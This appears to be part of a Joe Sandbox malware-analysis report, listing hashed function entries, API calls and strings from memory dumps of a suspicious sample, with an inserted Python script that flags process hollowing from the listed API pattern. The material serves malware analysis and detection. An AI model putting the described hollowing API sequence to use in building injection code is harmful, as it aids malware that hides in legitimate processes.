                                • Opcode ID: 5995f6b593ab8dfa2ca9206b272157b8f68b21a6909410650da2403951dcddc2
                                • Instruction ID: c471381a44e5823896a547ba04fb112db74be4f859645c71a1e0bbc5a48b3813
                                • Opcode Fuzzy Hash: 5995f6b593ab8dfa2ca9206b272157b8f68b21a6909410650da2403951dcddc2
                                • Instruction Fuzzy Hash: 1B1136B1D002498FDB20DFAAC4457EFFBF5EF98324F20841AD519A7240CB79A944CBA0
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0177B59E
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2467568471.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_1770000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: cf596309eb069f5865a651674c3b8a27e85c3ccba47ebc08e3c59c11c57a1a1b
                                • Instruction ID: c0767bca5b38203b61e1e5816d8be0c8bbffe3ad174aa566f61d48f056306f96
                                • Opcode Fuzzy Hash: cf596309eb069f5865a651674c3b8a27e85c3ccba47ebc08e3c59c11c57a1a1b
                                • Instruction Fuzzy Hash: BA11E0B5C002498FDB20DF9AC444ADEFBF4EF89314F24852AD929B7210D379A545CFA1
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 0EC812D5
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2482531996.000000000EC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EC80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_ec80000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 2a985530cd265b5c4350c01d38888bf8fc9640d5f192d6cec75ad274ea8d77cc
                                • Instruction ID: 2321d893d8627c5914b20bde9f6da52313bd82b00a01a59ad98645db9174dadd
                                • Opcode Fuzzy Hash: 2a985530cd265b5c4350c01d38888bf8fc9640d5f192d6cec75ad274ea8d77cc
                                • Instruction Fuzzy Hash: 5E1103B5800248DFDB10DF9AC684BDEBBF8FB48314F14840AE518B7610C379A944CFA1
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 0EC812D5
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2482531996.000000000EC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EC80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_ec80000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 4beff4ed99f615fa5f256edd6cdbc9eeb64974e2e4586c10ce6be0bc0b4686d8
                                • Instruction ID: 896c96651189125ef99f9a0680387d1b3f09490d60bd3571d247e298c81407f7
                                • Opcode Fuzzy Hash: 4beff4ed99f615fa5f256edd6cdbc9eeb64974e2e4586c10ce6be0bc0b4686d8
                                • Instruction Fuzzy Hash: B111D3B58003499FDB10DF9AC545BDEBBF8FB49314F14841AD518A7210C379A944CFA5
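Read together, the function entries above for the process with index 0000001B (snapshot hcaresult_27) list VirtualAllocEx, Wow64SetThreadContext, ResumeThread and ReadProcessMemory, which is the API pattern of process hollowing (a suspended child whose thread context is redirected into memory the parent allocated). The script below is an added example, not Joe Sandbox code: it parses records in the shape of this listing, checks that the snapshot's process number agrees with the hex process index in the Source File field, and scores each process against the hollowing steps. The sample input is constructed from the entries above with the fields the parser ignores omitted and the IDs shortened; the step names and the three-of-four threshold are the author's assumptions, chosen because a WriteProcessMemory entry does not appear in this part of the listing.

```python
import re
from collections import defaultdict

# Constructed sample in the shape of the report's function entries
# (fields the parser does not use are omitted, hashes shortened).
SAMPLE_REPORT = """\
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07AAD660
• Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
• Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
• API ID: MemoryProcessRead
• Opcode ID: 570ced3c2c6c087d
• Instruction Fuzzy Hash: 5C2107B1D003599F
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AACF9E
• Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
• Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
• API ID: ContextThreadWow64
• Opcode ID: 40e5347ef572dc4b
• Instruction Fuzzy Hash: D02115B19003099F
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07AAD49E
• Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
• Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
• API ID: AllocVirtual
• Opcode ID: a54e76b0ec62c8dd
• Instruction Fuzzy Hash: C01159B59002099F
APIs
• Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
• Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
• API ID: ResumeThread
• Opcode ID: f16b8f65f83d98b8
• Instruction Fuzzy Hash: DA1149B19002498F
Strings
• Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
• Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
• API ID:
• String ID: LR]q
• Opcode ID: 2d4ea0f0d8cf0fda
• Instruction Fuzzy Hash: 46212630B002158F
"""

API_CALL = re.compile(r"^• (\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")
SOURCE = re.compile(r"^• Source File: ([0-9A-F]{8})\.\S+\.sdmp, Offset: ([0-9A-F]+), based on PE: (true|false)$")
FIELD = re.compile(r"^• ([A-Za-z ]+): ?(.*)$")
SNAPSHOT = re.compile(r"^hcaresult_(\d+)_")

# Assumed mapping (author's choice): each hollowing step is evidenced either by
# the function name on the call line or by Joe Sandbox's 'API ID' label, since
# some entries (ResumeThread above) carry only the label.
HOLLOWING_STEPS = {
    "allocate memory in a remote process": {"VirtualAllocEx", "AllocVirtual"},
    "redirect a thread's entry point": {"Wow64SetThreadContext", "SetThreadContext",
                                        "ContextThreadWow64", "ContextThread"},
    "resume the suspended thread": {"ResumeThread"},
    "read back remote memory": {"ReadProcessMemory", "MemoryProcessRead"},
}


def parse_report(text):
    """One dict per function entry; an entry is flushed at its
    'Instruction Fuzzy Hash' line, the last field of every entry."""
    records, cur = [], {"apis": []}
    for line in text.splitlines():
        line = line.strip()
        m = API_CALL.match(line)
        if m:
            cur["apis"].append({"name": m.group(1), "module": m.group(2),
                                "args": m.group(3), "ref": m.group(4)})
            continue
        m = SOURCE.match(line)
        if m:
            cur["process"] = int(m.group(1), 16)   # hex process index
            cur["offset"] = m.group(2)
            cur["pe_based"] = m.group(3) == "true"
            continue
        m = FIELD.match(line)
        if m:
            cur[m.group(1)] = m.group(2)
            if m.group(1) == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = {"apis": []}
    return records


def snapshot_consistent(rec):
    """The decimal number in the snapshot name must equal the hex process index."""
    m = SNAPSHOT.match(rec.get("Snapshot File", ""))
    return bool(m) and int(m.group(1)) == rec.get("process")


def injection_evidence(records):
    """Per process: the hollowing steps its listed APIs cover."""
    seen = defaultdict(set)
    for rec in records:
        names = {a["name"] for a in rec["apis"]}
        names.add(rec.get("API ID", ""))
        seen[rec.get("process")] |= names
    return {proc: [step for step, ids in HOLLOWING_STEPS.items() if names & ids]
            for proc, names in seen.items()}


def flag_hollowing(records, minimum=3):
    """Processes covering at least `minimum` of the steps, sorted by index."""
    return sorted(p for p, steps in injection_evidence(records).items()
                  if len(steps) >= minimum)


if __name__ == "__main__":
    recs = parse_report(SAMPLE_REPORT)
    for proc, steps in injection_evidence(recs).items():
        print(proc, steps)
    print("hollowing candidates:", flag_hollowing(recs))
```

On the full report the same parser runs over the whole listing, so a record whose snapshot number disagrees with its Source File index, or a process that reaches the threshold without a ReadProcessMemory or WriteProcessMemory entry, stands out for manual review rather than being trusted as-is.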
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2464926496.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_140d000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5af32cb69e80fe6e652f4e290b95db154783ad1d7e0da551cd3c19ef289ff892
                                • Instruction ID: a6c62430d3b47b9e0fce2b37f53b908dc209186dcafc22981108d83ef50297ec
                                • Opcode Fuzzy Hash: 5af32cb69e80fe6e652f4e290b95db154783ad1d7e0da551cd3c19ef289ff892
                                • Instruction Fuzzy Hash: 0921F471900240DFDB06DF99D980F27BF65FB88318F20C57AED090B2A6C33AD41AC6A1
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2465026342.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_141d000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3f51e3d68c794747b5f656f92b7a157edf5d0ec50494b8468e0e118354e4e90a
                                • Instruction ID: cebec091728aafe04975649aa873c362aa523debd876012d22ae99a18c7ed8c2
                                • Opcode Fuzzy Hash: 3f51e3d68c794747b5f656f92b7a157edf5d0ec50494b8468e0e118354e4e90a
                                • Instruction Fuzzy Hash: C62107B1944204DFDB05DF98D9C8F66BBA5FB84324F20C66ED9194B36AC33AD406CA61
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2465026342.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_141d000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 01d16551a1560dd581fe7c9b729e6ad39358584948cbf640279569c44d70a989
                                • Instruction ID: b89a43b5511a58358fded97e3ab66be961c60cc0836c884137452e90a23a4b91
                                • Opcode Fuzzy Hash: 01d16551a1560dd581fe7c9b729e6ad39358584948cbf640279569c44d70a989
                                • Instruction Fuzzy Hash: 882125F5A04200DFCB15DF68D988B16BF65FB84318F20C56ED90A0B36AC33AD407CA61
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2465026342.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_141d000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9acf243322edc24598b601ae466ebe9845e9a8b0c4d41acc72a812db11c3f84f
                                • Instruction ID: 60f5de3a361db47b3047c738f9cd5b45ed907235d08723096f08b53c480470c9
                                • Opcode Fuzzy Hash: 9acf243322edc24598b601ae466ebe9845e9a8b0c4d41acc72a812db11c3f84f
                                • Instruction Fuzzy Hash: 0D2192B55093808FDB07CF24D594716BF71EB46214F28C5DBD8498F2A7C33A980ACB62
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2464926496.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_140d000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                • Instruction ID: da3afa56ec206fc36f90f67ac42aa01cf4af333576415a6b9133d3f349d3d68e
                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                • Instruction Fuzzy Hash: 2211A276904240CFDB16CF54D5C4B16BF71FB88314F24C5AADD450B666C336D45ACBA1
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2465026342.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_141d000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction ID: 88069b86647ae4ad3f9c60cb7d782eb73d9c00a163b5e5f9d2fd3b8f10f81323
                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction Fuzzy Hash: 7711BEB5904280DFDB02CF54C5C4B16BFA1FB84224F24C6AAD8494B766C33AD40ACB61
                                Strings
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q$$]q
                                • API String ID: 0-182748909
                                • Opcode ID: 1a5a84d9470b770c916292a94c9f3e68b0dbc6402691a0fb06e661211364da64
                                • Instruction ID: cbfb8d4636b679b6d1ae28f3976e2a29b3a905f241d7b4bd514711c53382c547
                                • Opcode Fuzzy Hash: 1a5a84d9470b770c916292a94c9f3e68b0dbc6402691a0fb06e661211364da64
                                • Instruction Fuzzy Hash: F8F1AE347003018FDB09AF78E958B6E7BA6FF88704F148428E90ADB7A5DE759C05DB91
                                Strings
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q
                                • API String ID: 0-127220927
                                • Opcode ID: c2e175793bcf8241164b00ccde9d8eb3d2ec6d5e5a17dbebda24ecf4d9d0805a
                                • Instruction ID: 9c81f4eedb0e9494c0dee0c4c228997df50bbf78000d8b2a255625dbb975abdc
                                • Opcode Fuzzy Hash: c2e175793bcf8241164b00ccde9d8eb3d2ec6d5e5a17dbebda24ecf4d9d0805a
                                • Instruction Fuzzy Hash: B0C1BE347003018FCB09AF34E958B2E77A7FB88745F148528E90A9B7A9DF759C06DB91
                                Strings
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q
                                • API String ID: 0-127220927
                                • Opcode ID: d65a9f2ea2bfb89dc012256c1a7631a0b2fa9e851ea4c71833fd6554594845a1
                                • Instruction ID: 39c98089b49304973ca13258294be711e51294fd9978c9e81dc9adc47dbb67f4
                                • Opcode Fuzzy Hash: d65a9f2ea2bfb89dc012256c1a7631a0b2fa9e851ea4c71833fd6554594845a1
                                • Instruction Fuzzy Hash: 05A1BE307003018FD719AF78D954B2E77E7BF88715F148828D90A9B3A9DF35AC069BA1
                                Strings
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: LR]q
                                • API String ID: 0-3081347316
                                • Opcode ID: 2d4ea0f0d8cf0fda46f9b4cff05b4cbf879ed62718133ffffd68075fe2bdc639
                                • Instruction ID: 143456394e9c714ae53277ab87901a2774dde357c5dedd111ac61378e897e7b4
                                • Opcode Fuzzy Hash: 2d4ea0f0d8cf0fda46f9b4cff05b4cbf879ed62718133ffffd68075fe2bdc639
                                • Instruction Fuzzy Hash: 46212630B002158FCB59EB78855563E7BF2AFC8304B2488A9D509DB396DE74DD06C7A2
                                Strings
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: LR]q
                                • API String ID: 0-3081347316
                                • Opcode ID: 866f2a591fb9d277ed92800ca78de5865e7e26e392908443f001783f776413b3
                                • Instruction ID: bfc0a2ae36a38b856080aa297e393c54718075340e795531ec344c9966c0800c
                                • Opcode Fuzzy Hash: 866f2a591fb9d277ed92800ca78de5865e7e26e392908443f001783f776413b3
                                • Instruction Fuzzy Hash: EE213730B002559FCB55DB38885563E7BF2AFC5305B288869D44ADB395DE30CD0783A2
                                Strings
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: Haq
                                • API String ID: 0-725504367
                                • Opcode ID: 4fdb5d44dae2334381300b6e1b0d06cfb495a9b3c2e3478c63af6311e488bfda
                                • Instruction ID: 849674fe482ce5327296c7602f42fafe8b1c97f421eb2258fa62550053f01e9f
                                • Opcode Fuzzy Hash: 4fdb5d44dae2334381300b6e1b0d06cfb495a9b3c2e3478c63af6311e488bfda
                                • Instruction Fuzzy Hash: B721B030E082489FCB44EBB888553AD7FE1AF45310F1580BAC848DB396EE348E06C7A1
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 96c0a3ad32b1801a5b7cc0ba815e125fa71ba073290006a7c9019c31207aeeb4
                                • Instruction ID: 12fd1cb5df2e95e2375f5dd8b95ff8bb55e3e11fa7356fad98317697cb680d3d
                                • Opcode Fuzzy Hash: 96c0a3ad32b1801a5b7cc0ba815e125fa71ba073290006a7c9019c31207aeeb4
                                • Instruction Fuzzy Hash: 1F217E309093959FCB02EF78E9A06EDBFB4EF46304B0444EBD449DB262E6305A09CB61
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8b58ea8eaf1a32fb3df12ce6e8a1adcae4211fde531e3e2979f318d5ce6eb7e1
                                • Instruction ID: c1955a4d62f8b5d678398075175e24e65731757d86591ceaa450a56bda6224f8
                                • Opcode Fuzzy Hash: 8b58ea8eaf1a32fb3df12ce6e8a1adcae4211fde531e3e2979f318d5ce6eb7e1
                                • Instruction Fuzzy Hash: EB21B571B042059FCB04AFBD995536E7ADAEFC9300B14886AD45EC3396ED344C098761
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 185a31ecd52a7ad2ae7e138d690e5c8b40ef972cffe71703629608ad0d6b003c
                                • Instruction ID: 1ed0ef2979cdadad583c2ad2a802c31aab0ce98c2aeba589c99ffc4cd9e732da
                                • Opcode Fuzzy Hash: 185a31ecd52a7ad2ae7e138d690e5c8b40ef972cffe71703629608ad0d6b003c
                                • Instruction Fuzzy Hash: B2318F74900349DFCB05EFB8EA4079D7BBAFF89304F104969D405AB359DB34AA49CB51
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e752c0f136b196fe31284d027c8bf6cb8282f6d9237bef05e152c12180c78a8d
                                • Instruction ID: d066e521859fe680a2afe80f8fb84de7f624f06664b8fddafb0bedf04675619c
                                • Opcode Fuzzy Hash: e752c0f136b196fe31284d027c8bf6cb8282f6d9237bef05e152c12180c78a8d
                                • Instruction Fuzzy Hash: 9F219174900309DFCB05EFB4EA44B9D7BBAFF88304F104969D405A7358DB34AA45CB51
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4d08a84859f599b696a0934b5d0cf2b634570227f8a3c9f2f51a58f2c6521712
                                • Instruction ID: 02a44919379a16e5ee7a80ce51d4777a9942471fd058260fa22cd79fd308233e
                                • Opcode Fuzzy Hash: 4d08a84859f599b696a0934b5d0cf2b634570227f8a3c9f2f51a58f2c6521712
                                • Instruction Fuzzy Hash: 4811DD346563459FCB06EF68FB54B457BB9FB553087005AA5D0088FA3ED774AA09CF80
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1ad9639ad0fed1a2b356a6c3ed2e01ad83775f24489036c17eab090a970306eb
                                • Instruction ID: d7a3a76c79bd0e86c425c158357615aa3b4128511d2af1c403277bd8ad1cdd92
                                • Opcode Fuzzy Hash: 1ad9639ad0fed1a2b356a6c3ed2e01ad83775f24489036c17eab090a970306eb
                                • Instruction Fuzzy Hash: 8D111530D10209AFCB44FFB8EA51AACBBF9EF44304B108569D009E7365EB306A05CB60
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9ea980409ca567b30b22a45e5c36f12ebfc382c0a48d24ecfbc21ac93b8498e6
                                • Instruction ID: 1e99a2dffdc3649dcc275da3e5f83ebcb3d940122cd3caa0e8f11d458ff3256a
                                • Opcode Fuzzy Hash: 9ea980409ca567b30b22a45e5c36f12ebfc382c0a48d24ecfbc21ac93b8498e6
                                • Instruction Fuzzy Hash: 830199356523069FCB06FF18FB94F5577A9FB54349B009A6490088BB2DE774AA0ACF80